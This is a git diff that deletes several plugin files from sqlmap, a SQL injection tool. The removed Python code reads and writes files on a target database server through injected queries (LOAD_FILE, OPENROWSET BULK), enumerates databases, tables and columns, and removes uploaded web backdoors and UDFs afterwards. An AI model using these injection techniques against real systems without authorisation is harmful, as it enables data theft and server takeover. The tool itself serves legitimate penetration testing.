- """ - - def __init__(self): - self.fileTblName = "sqlmapfile" - self.tblField = "data" - - def _checkFileLength(self, localFile, remoteFile, fileRead=False): - if Backend.isDbms(DBMS.MYSQL): - lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile - - elif Backend.isDbms(DBMS.PGSQL) and not fileRead: - lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid - - elif Backend.isDbms(DBMS.MSSQL): - self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") - inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); - - lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) - - try: - localFileSize = os.path.getsize(localFile) - except OSError: - warnMsg = "file '%s' is missing" % localFile - logger.warn(warnMsg) - localFileSize = 0 - - if fileRead and Backend.isDbms(DBMS.PGSQL): - logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) - sameFile = True - else: - logger.debug("checking the length of the remote file '%s'" % remoteFile) - remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - sameFile = None - - if isNumPosStrValue(remoteFileSize): - remoteFileSize = long(remoteFileSize) - localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding()) - sameFile = False - - if localFileSize == remoteFileSize: - sameFile = True - infoMsg = "the local file '%s' and the remote file " % localFile - infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) - elif remoteFileSize > localFileSize: - infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) - infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) - else: - infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) - 
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) - - logger.info(infoMsg) - else: - sameFile = False - warnMsg = "it looks like the file has not been written (usually " - warnMsg += "occurs if the DBMS process' user has no write " - warnMsg += "privileges in the destination path)" - logger.warn(warnMsg) - - return sameFile - - def fileToSqlQueries(self, fcEncodedList): - """ - Called by MySQL and PostgreSQL plugins to write a file on the - back-end DBMS underlying file system - """ - - counter = 0 - sqlQueries = [] - - for fcEncodedLine in fcEncodedList: - if counter == 0: - sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine)) - else: - updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine) - sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField)) - - counter += 1 - - return sqlQueries - - def fileEncode(self, fileName, encoding, single, chunkSize=256): - """ - Called by MySQL and PostgreSQL plugins to write a file on the - back-end DBMS underlying file system - """ - - with open(fileName, "rb") as f: - content = f.read() - - return self.fileContentEncode(content, encoding, single, chunkSize) - - def fileContentEncode(self, content, encoding, single, chunkSize=256): - retVal = [] - - if encoding: - content = content.encode(encoding).replace("\n", "") - - if not single: - if len(content) > chunkSize: - for i in xrange(0, len(content), chunkSize): - _ = content[i:i + chunkSize] - - if encoding == "hex": - _ = "0x%s" % _ - elif encoding == "base64": - _ = "'%s'" % _ - - retVal.append(_) - - if not retVal: - if encoding == "hex": - content = "0x%s" % content - elif encoding == "base64": - content = "'%s'" % content - - retVal = [content] - - return retVal - - def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): - output = None - - if forceCheck is not True: - message = "do you want confirmation that the local file '%s' " % localFile - message 
+= "has been successfully written on the back-end DBMS " - message += "file system ('%s')? [Y/n] " % remoteFile - output = readInput(message, default="Y") - - if forceCheck or (output and output.lower() == "y"): - return self._checkFileLength(localFile, remoteFile) - - return True - - def askCheckReadFile(self, localFile, remoteFile): - message = "do you want confirmation that the remote file '%s' " % remoteFile - message += "has been successfully downloaded from the back-end " - message += "DBMS file system? [Y/n] " - output = readInput(message, default="Y") - - if not output or output in ("y", "Y"): - return self._checkFileLength(localFile, remoteFile, True) - - return None - - def nonStackedReadFile(self, remoteFile): - errMsg = "'nonStackedReadFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def stackedReadFile(self, remoteFile): - errMsg = "'stackedReadFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): - errMsg = "'unionWriteFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): - errMsg = "'stackedWriteFile' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def readFile(self, remoteFiles): - localFilePaths = [] - - self.checkDbmsOs() - - for remoteFile in remoteFiles.split(","): - fileContent = None - kb.fileReadMode = True - - if conf.direct or isStackingAvailable(): - if isStackingAvailable(): - debugMsg = "going to read the file with stacked query SQL " - debugMsg += "injection technique" - logger.debug(debugMsg) - - fileContent = self.stackedReadFile(remoteFile) - elif Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to read the file with a 
non-stacked query " - debugMsg += "SQL injection technique" - logger.debug(debugMsg) - - fileContent = self.nonStackedReadFile(remoteFile) - else: - errMsg = "none of the SQL injection techniques detected can " - errMsg += "be used to read files from the underlying file " - errMsg += "system of the back-end %s server" % Backend.getDbms() - logger.error(errMsg) - - fileContent = None - - kb.fileReadMode = False - - if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): - self.cleanup(onlyFileTbl=True) - elif isListLike(fileContent): - newFileContent = "" - - for chunk in fileContent: - if isListLike(chunk): - if len(chunk) > 0: - chunk = chunk[0] - else: - chunk = "" - - if chunk: - newFileContent += chunk - - fileContent = newFileContent - - if fileContent is not None: - fileContent = decodeHexValue(fileContent, True) - - if fileContent: - localFilePath = dataToOutFile(remoteFile, fileContent) - - if not Backend.isDbms(DBMS.PGSQL): - self.cleanup(onlyFileTbl=True) - - sameFile = self.askCheckReadFile(localFilePath, remoteFile) - - if sameFile is True: - localFilePath += " (same file)" - elif sameFile is False: - localFilePath += " (size differs from remote file)" - - localFilePaths.append(localFilePath) - else: - errMsg = "no data retrieved" - logger.error(errMsg) - - return localFilePaths - - def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): - written = False - - checkFile(localFile) - - self.checkDbmsOs() - - if localFile.endswith('_'): - localFile = decloakToTemp(localFile) - - if conf.direct or isStackingAvailable(): - if isStackingAvailable(): - debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "stacked query SQL injection technique" - logger.debug(debugMsg) - - written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) - self.cleanup(onlyFileTbl=True) - elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to upload the file '%s' 
with " % fileType - debugMsg += "UNION query SQL injection technique" - logger.debug(debugMsg) - - written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) - else: - errMsg = "none of the SQL injection techniques detected can " - errMsg += "be used to write files to the underlying file " - errMsg += "system of the back-end %s server" % Backend.getDbms() - logger.error(errMsg) - - return None - - return written diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py deleted file mode 100644 index d8f744c5..00000000 --- a/plugins/generic/fingerprint.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import readInput -from lib.core.data import logger -from lib.core.enums import OS -from lib.core.exception import SqlmapUndefinedMethod - -class Fingerprint: - """ - This class defines generic fingerprint functionalities for plugins. - """ - - def __init__(self, dbms): - Backend.forceDbms(dbms) - - def getFingerprint(self): - errMsg = "'getFingerprint' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def checkDbms(self): - errMsg = "'checkDbms' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def checkDbmsOs(self, detailed=False): - errMsg = "'checkDbmsOs' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def forceDbmsEnum(self): - pass - - def userChooseDbmsOs(self): - warnMsg = "for some reason sqlmap was unable to fingerprint " - warnMsg += "the back-end DBMS operating system" - logger.warn(warnMsg) - - msg = "do you want to provide the OS? 
[(W)indows/(l)inux]" - - while True: - os = readInput(msg, default="W") - - if os[0].lower() == "w": - Backend.setOs(OS.WINDOWS) - break - elif os[0].lower() == "l": - Backend.setOs(OS.LINUX) - break - else: - warnMsg = "invalid value" - logger.warn(warnMsg) diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py deleted file mode 100644 index 143cc18a..00000000 --- a/plugins/generic/misc.py +++ /dev/null @@ -1,212 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import ntpath -import re - -from lib.core.common import Backend -from lib.core.common import hashDBWrite -from lib.core.common import isStackingAvailable -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import posixToNtSlashes -from lib.core.common import readInput -from lib.core.common import singleTimeDebugMessage -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import OS -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject - -class Miscellaneous: - """ - This class defines miscellaneous functionalities for plugins. 
- """ - - def __init__(self): - pass - - def getRemoteTempPath(self): - if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): - debugMsg = "identifying Microsoft SQL Server error log directory " - debugMsg += "that sqlmap will use to store temporary files with " - debugMsg += "commands' output" - logger.debug(debugMsg) - - _ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) - - if _: - conf.tmpPath = ntpath.dirname(_) - - if not conf.tmpPath: - if Backend.isOs(OS.WINDOWS): - if conf.direct: - conf.tmpPath = "%TEMP%" - else: - self.checkDbmsOs(detailed=True) - - if Backend.getOsVersion() in ("2000", "NT"): - conf.tmpPath = "C:/WINNT/Temp" - elif Backend.isOs("XP"): - conf.tmpPath = "C:/Documents and Settings/All Users/Application Data/Temp" - else: - conf.tmpPath = "C:/Windows/Temp" - else: - conf.tmpPath = "/tmp" - - if re.search(r"\A[\w]:[\/\\]+", conf.tmpPath, re.I): - Backend.setOs(OS.WINDOWS) - - conf.tmpPath = normalizePath(conf.tmpPath) - conf.tmpPath = ntToPosixSlashes(conf.tmpPath) - - singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) - - hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) - - return conf.tmpPath - - def getVersionFromBanner(self): - if "dbmsVersion" in kb.bannerFp: - return - - infoMsg = "detecting back-end DBMS version from its banner" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL): - first, last = 1, 6 - - elif Backend.isDbms(DBMS.PGSQL): - first, last = 12, 6 - - elif Backend.isDbms(DBMS.MSSQL): - first, last = 29, 9 - - else: - raise SqlmapUnsupportedFeatureException("unsupported DBMS") - - query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last) - - if conf.direct: - query = "SELECT %s" % query - - kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) - kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", 
"").replace(" ", "") - - def delRemoteFile(self, filename): - if not filename: - return - - self.checkDbmsOs() - - if Backend.isOs(OS.WINDOWS): - filename = posixToNtSlashes(filename) - cmd = "del /F /Q %s" % filename - else: - cmd = "rm -f %s" % filename - - self.execCmd(cmd, silent=True) - - def createSupportTbl(self, tblName, tblField, tblType): - inject.goStacked("DROP TABLE %s" % tblName, silent=True) - - if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: - inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) - else: - inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) - - def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): - """ - Cleanup file system and database from sqlmap create files, tables - and functions - """ - - if web and self.webBackdoorFilePath: - logger.info("cleaning up the web files uploaded") - - self.delRemoteFile(self.webStagerFilePath) - self.delRemoteFile(self.webBackdoorFilePath) - - if not isStackingAvailable() and not conf.direct: - return - - if Backend.isOs(OS.WINDOWS): - libtype = "dynamic-link library" - - elif Backend.isOs(OS.LINUX): - libtype = "shared object" - - else: - libtype = "shared library" - - if onlyFileTbl: - logger.debug("cleaning up the database management system") - else: - logger.info("cleaning up the database management system") - - logger.debug("removing support tables") - inject.goStacked("DROP TABLE %s" % self.fileTblName, silent=True) - inject.goStacked("DROP TABLE %shex" % self.fileTblName, silent=True) - - if not onlyFileTbl: - inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) - - if Backend.isDbms(DBMS.MSSQL): - udfDict = {"master..new_xp_cmdshell": None} - - if udfDict is None: - udfDict = self.sysUdfs - - for udf, inpRet in udfDict.items(): - message = "do you want to remove UDF '%s'? 
[Y/n] " % udf - output = readInput(message, default="Y") - - if not output or output in ("y", "Y"): - dropStr = "DROP FUNCTION %s" % udf - - if Backend.isDbms(DBMS.PGSQL): - inp = ", ".join(i for i in inpRet["input"]) - dropStr += "(%s)" % inp - - logger.debug("removing UDF '%s'" % udf) - inject.goStacked(dropStr, silent=True) - - logger.info("database management system cleanup finished") - - warnMsg = "remember that UDF %s files " % libtype - - if conf.osPwn: - warnMsg += "and Metasploit related files in the temporary " - warnMsg += "folder " - - warnMsg += "saved on the file system can only be deleted " - warnMsg += "manually" - logger.warn(warnMsg) - - def likeOrExact(self, what): - message = "do you want sqlmap to consider provided %s(s):\n" % what - message += "[1] as LIKE %s names (default)\n" % what - message += "[2] as exact %s names" % what - - choice = readInput(message, default='1') - - if not choice or choice == '1': - choice = '1' - condParam = " LIKE '%%%s%%'" - elif choice == '2': - condParam = "='%s'" - else: - errMsg = "invalid value" - raise SqlmapNoneDataException(errMsg) - - return choice, condParam diff --git a/plugins/generic/search.py b/plugins/generic/search.py deleted file mode 100644 index 8686f987..00000000 --- a/plugins/generic/search.py +++ /dev/null @@ -1,606 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import getLimitRange -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import 
safeStringFormat -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.core.settings import METADB_SUFFIX -from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists - -class Search: - """ - This class defines search functionalities for plugins. - """ - - def __init__(self): - pass - - def searchDb(self): - foundDbs = [] - rootQuery = queries[Backend.getIdentifiedDbms()].search_db - dbList = conf.db.split(",") - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - dbCond = rootQuery.inband.condition2 - else: - dbCond = rootQuery.inband.condition - - dbConsider, dbCondParam = self.likeOrExact("database") - - for db in dbList: - values = [] - db = safeSQLIdentificatorNaming(db) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - db = db.upper() - - infoMsg = "searching database" - if dbConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - if conf.excludeSysDbs: - exclDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg) - else: - exclDbsQuery = "" - - dbQuery = "%s%s" % (dbCond, dbCondParam) - dbQuery = dbQuery % unsafeSQLIdentificatorNaming(db) - - 
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - - query = query % (dbQuery + exclDbsQuery) - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - values = arrayizeValue(values) - - for value in values: - value = safeSQLIdentificatorNaming(value) - foundDbs.append(value) - - if not values and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of database" - if dbConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 - else: - query = rootQuery.blind.count - - query = query % (dbQuery + exclDbsQuery) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no database" - if dbConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.query2 - else: - query = rootQuery.blind.query - - query = query % (dbQuery + exclDbsQuery) - query = agent.limitQuery(index, query, dbCond) - - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - value = safeSQLIdentificatorNaming(value) - foundDbs.append(value) - - conf.dumper.lister("found databases", foundDbs) - - def searchTable(self): - bruteForce = False - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL 
< 5.0" - bruteForce = True - - if bruteForce: - message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - regex = "|".join(conf.tbl.split(",")) - return tableExists(paths.COMMON_TABLES, regex) - - foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table - tblCond = rootQuery.inband.condition - dbCond = rootQuery.inband.condition2 - tblConsider, tblCondParam = self.likeOrExact("table") - - for tbl in tblList: - values = [] - tbl = safeSQLIdentificatorNaming(tbl, True) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD): - tbl = tbl.upper() - - infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - - if dbCond and conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" - infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) - elif conf.excludeSysDbs: - whereDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - whereDbsQuery = "" - - logger.info(infoMsg) - - tblQuery = "%s%s" % (tblCond, tblCondParam) - tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - - query = query % (tblQuery + whereDbsQuery) 
- values = inject.getValue(query, blind=False, time=False) - - if values and Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - newValues = [] - - if isinstance(values, basestring): - values = [values] - for value in values: - dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" - newValues.append(["%s%s" % (dbName, METADB_SUFFIX), value]) - - values = newValues - - for foundDb, foundTbl in filterPairValues(values): - foundDb = safeSQLIdentificatorNaming(foundDb) - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) - - if foundDb is None or foundTbl is None: - continue - - if foundDb in foundTbls: - foundTbls[foundDb].append(foundTbl) - else: - foundTbls[foundDb] = [foundTbl] - - if not values and isInferenceAvailable() and not conf.direct: - if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - if len(whereDbsQuery) == 0: - infoMsg = "fetching number of databases with table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.info(infoMsg) - - query = rootQuery.blind.count - query = query % (tblQuery + whereDbsQuery) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no databases have table" - if tblConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query % (tblQuery + whereDbsQuery) - query = agent.limitQuery(index, query) - - foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False)) - foundDb = safeSQLIdentificatorNaming(foundDb) - - if foundDb not in foundTbls: - foundTbls[foundDb] = [] - - if tblConsider == "2": - foundTbls[foundDb].append(tbl) - - if tblConsider == "2": - continue - else: - for db in conf.db.split(",") if conf.db else 
(self.getCurrentDb(),): - db = safeSQLIdentificatorNaming(db) - if db not in foundTbls: - foundTbls[db] = [] - else: - dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" - foundTbls["%s%s" % (dbName, METADB_SUFFIX)] = [] - - for db in foundTbls.keys(): - db = safeSQLIdentificatorNaming(db) - - infoMsg = "fetching number of table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) - logger.info(infoMsg) - - query = rootQuery.blind.count2 - if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - query = query % unsafeSQLIdentificatorNaming(db) - query += " AND %s" % tblQuery - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no table" - if tblConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query2 - - if query.endswith("'%s')"): - query = query[:-1] + " AND %s)" % tblQuery - else: - query += " AND %s" % tblQuery - - if Backend.isDbms(DBMS.FIREBIRD): - query = safeStringFormat(query, index) - - if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) - - if not Backend.isDbms(DBMS.FIREBIRD): - query = agent.limitQuery(index, query) - - foundTbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if not isNoneValue(foundTbl): - kb.hintValue = foundTbl - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) - foundTbls[db].append(foundTbl) - - for db in foundTbls.keys(): - if isNoneValue(foundTbls[db]): - del foundTbls[db] - - if not foundTbls: - warnMsg = "no databases contain any of the 
provided tables" - logger.warn(warnMsg) - return - - conf.dumper.dbTables(foundTbls) - self.dumpFoundTables(foundTbls) - - def searchColumn(self): - bruteForce = False - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - bruteForce = True - - if bruteForce: - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - regex = '|'.join(conf.col.split(',')) - conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) - - message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - - if output and output[0] not in ("n", "N"): - self.dumpAll() - - return - - rootQuery = queries[Backend.getIdentifiedDbms()].search_column - foundCols = {} - dbs = {} - whereDbsQuery = "" - whereTblsQuery = "" - infoMsgTbl = "" - infoMsgDb = "" - colList = conf.col.split(",") - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - origTbl = conf.tbl - origDb = conf.db - colCond = rootQuery.inband.condition - dbCond = rootQuery.inband.condition2 - tblCond = rootQuery.inband.condition3 - colConsider, colCondParam = self.likeOrExact("column") - - for column in colList: - values = [] - column = safeSQLIdentificatorNaming(column) - conf.db = origDb - conf.tbl = origTbl - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - column = column.upper() - - infoMsg = "searching column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - - foundCols[column] = {} - - if conf.tbl: - _ = conf.tbl.split(",") - whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, 
unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" - infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in _)) - - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" - infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _)) - elif conf.excludeSysDbs: - whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - infoMsgDb = " across all databases" - - logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) - - colQuery = "%s%s" % (colCond, colCondParam) - colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if not all((conf.db, conf.tbl)): - # Enumerate tables containing the column provided if - # either of database(s) or table(s) is not provided - query = rootQuery.inband.query - query = query % (colQuery + whereDbsQuery + whereTblsQuery) - values = inject.getValue(query, blind=False, time=False) - else: - # Assume provided databases' tables contain the - # column(s) provided - values = [] - - for db in conf.db.split(","): - for tbl in conf.tbl.split(","): - values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)]) - - for db, tbl in filterPairValues(values): - db = safeSQLIdentificatorNaming(db) - tbls = tbl.split(",") if not isNoneValue(tbl) else [] - - for tbl in tbls: - tbl = safeSQLIdentificatorNaming(tbl, True) - - if db is None or tbl is None: - continue - - conf.db = db - 
